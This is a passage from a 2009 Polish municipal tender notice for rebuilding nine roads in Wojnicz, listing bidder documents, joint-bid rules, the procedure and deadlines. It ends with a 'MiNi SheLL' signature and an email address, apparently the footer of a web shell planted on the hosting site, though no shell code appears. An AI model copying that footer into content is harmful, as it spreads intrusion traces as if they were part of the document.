3) Zaświadczenie wydane przez właściwą izbę samorządu zawodowego ( Okręgową Izbę Inżynierów Budownictwa ) potwierdzające aktualny na dzień składania ofert - wpis Kierownika budowy - na listę członków właściwej izby oraz posiadanie przez nią wymaganego ubezpieczenia od odpowiedzialności cywilnej. Uwaga: W ODNIESIENIU DO OSÓB, KTÓRYMI WYKONAWCA BĘDZIE DYSPONOWAŁ, a więc nie będącymi jego pracownikami do oferty należy załączyć pisemne zobowiązanie podmiotów, które dysponują tymi osobami do ich udostępnienia.  W przypadku prowadzenia przez te  osoby samodzielnej działalności należy do oferty dołączyć pisemne zobowiązanie tych osób do podjęcia się pełnienia określonej funkcji.   
1. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca jest zobowiązany przedłożyć następujące dokumenty:
1) Informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym Wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy - wystawioną nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert.
W przypadku przedstawienia opinii banku o zdolności kredytowej - musi z niej jednoznacznie wynikać, że Bank po przeprowadzeniu analizy aktualnej sytuacji ekonomicznej - potwierdza, że Wykonawca posiada wymaganą zdolność kredytową do wysokości kwoty nie mniejszej niż 80 % ceny brutto złożonej oferty. Do wydania oceny, czy Wykonawca posiada zdolność kredytową upoważniony jest jedynie Bank w którym Wykonawca posiada rachunek.
2) Polisę, a przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości nie mniejszej niż 200 tys. zł.
Polisa ubezpieczeniowa w dniu otwarcia ofert musi być ważna minimum do upływu terminu związania z ofertą. 
4.  Postanowienia dotyczące wnoszenia oferty wspólnej  - przez dwa lub więcej podmioty gospodarcze.
1) Wykonawcy mogą wspólnie ubiegać o udzielenie zamówienia,
2) Każdy Wykonawca, który wspólnie ubiega się o udzielenie zamówienia musi udokumentować, iż posiada uprawnienia do wykonania określonej działalności lub czynności i nie podlega wykluczeniu z postępowania.
Natomiast przy ocenie spełniania warunków, o których mowa w art. 22   ust. 1 pkt 2 i 3 ustawy Prawo zamówień publicznych  należy brać pod uwagę łączny potencjał techniczny i kadrowy oraz  kwalifikacje, doświadczenie i sytuację ekonomiczną  Wykonawców.
3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy.  Do oferty należy dołączyć stosowne pełnomocnictwo podpisane przez osoby upoważnione do składania oświadczenia woli każdego ze wspólników. Pełnomocnictwo takie powinno być przedstawione w formie oryginału lub kserokopii poświadczonej notarialnie za zgodność z oryginałem. 
4) Jeżeli oferta wspólna złożona przez dwóch lub więcej Wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza, przed podpisaniem umowy w sprawie zamówienia publicznego Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych Wykonawców, podpisanej przez wszystkich partnerów, przy czym termin, na jaki została zawarta, nie może być krótszy niż termin realizacji zamówienia.
5) W zakresie dokumentów potwierdzających spełnienie warunków w zakresie  wymaganego doświadczenia i potencjału ludzkiego oraz zdolności finansowej, Zamawiający dopuszcza możliwość sumowania potencjałów wszystkich Wykonawców wspólnie ubiegających się o zamówienie - dlatego złożone dokumenty będą traktowane jako wspólne.
6) W przypadku spółek cywilnych do oferty należy dołączyć zaświadczenia z Urzędu Skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno dla spółki, jak i dla każdego ze wspólników.
7) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
5. Postanowienia dotyczące Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej.
1) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o którym mowa: 
a) w punkcie 1 ppkt. 4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej 6 miesięcy przed upływem terminu składania ofert,
b) w punkcie 1 ppkt. 5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, że nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne  - albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej 3 miesiące przed upływem terminu składania ofert,
c) w punkcie 1 ppkt 7 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania - że nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej 6 miesiące przed upływem terminu składania ofert,
d) w punkcie 1 ppkt 6 składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawione nie wcześniej 6 miesiące przed upływem terminu składania ofert,
2) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się tych dokumentów - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
6. Pozostałe dokumenty, jakie musi zawierać oferta:
1) Wypełniony i podpisany Formularz oferty wg wzoru określonego formularzem - załącznik 1 do SIWZ,
2) Pełnomocnictwo (-a) do składania woli w imieniu Wykonawcy, tylko w tym przypadku, gdy upoważnienie do składania woli w imieniu Wykonawcy nie wynika z aktualnego opisu z właściwego rejestru, albo z aktualnego zaświadczenia  o wpisie do ewidencji działalności gospodarczej.   
Pełnomocnictwo takie musi być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza.
3) Kosztorysy ofertowe - które stanowią kalkulację ceny za wykonanie odbudowy wszystkich poszczególnych 9 dróg gminnych - muszą zostać sporządzone przez Wykonawców - metodą kalkulacji uproszczonej wg wzoru określonego formularzami - załączniki nr 4, nr 5, nr 6, nr 7, nr 8, nr 9, nr 10, nr 11, nr 12 do SIWZ. 
4) Harmonogram rzeczowo - terminowo - finansowy, zawierający wszystkie koszty niezbędne do zrealizowana przedmiotu zamówienia z ich podziałem na zakresy realizacyjne, które mogą stanowić osobny element odbioru częściowego z uwzględnieniem terminów realizacji każdego z nich. 
5) Dowód wpłaty wadium. 
6) Wykaz dokumentów zastrzeżonych jako tajne jeżeli takie stanowią część oferty. 
Wykonawcy przygotowując oferty winni zastrzec, które informacje w rozumieniu art. 11 ust. 4 ustawy o zwalczaniu nieuczciwej konkurencji ( Dz. U. z 2003 r. Nr 153 poz.1503 z późn. zm. ) stanowią tajemnicę przedsiębiorstwa. Objęte powyższym zastrzeżeniem dokumenty stanowiące tajemnicę przedsiębiorstwa Wykonawca zamieści w oddzielnej kopercie.
Uwaga: Stosownie do art. 8 ust. 3 ustawy Prawo Zamówień Publicznych Wykonawca może zastrzec nie później niż w terminie składania ofert, które ze złożonych informacji stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji i nie mogą być udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 cytowanej ustawy.
7.  Postanowienia dotyczące składanych dokumentów.
1) Wszystkie dokumenty Wykonawcy składają w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
2) Zamawiający nie dopuszcza składania elektronicznych kopii dokumentów.
3) Dokumenty sporządzone w języku obcym składa się wraz z tłumaczeniem na język polski. Tłumaczenie musi być sporządzone lub poświadczone przez tłumacza przysięgłego.
4) Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy Prawo zamówień publicznych.
5) Oferta powinna zawierać wszystkie wymagane dokumenty, oświadczenia i załączniki o których mowa w Specyfikacji Istotnych Warunków Zamówienia.
6) Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania spowoduje wykluczenie Wykonawcy z dalszego postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wojnicz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w  Wojniczu, adres:  32-830 Wojnicz  ul. Rynek 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2009 godzina 12:30, miejsce: siedziba Zamawiającego: Urząd Miejski w Wojniczu - pokój nr 11 -                   ( Sekretariat ), adres: 32-830 Wojnicz  ul. Rynek 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com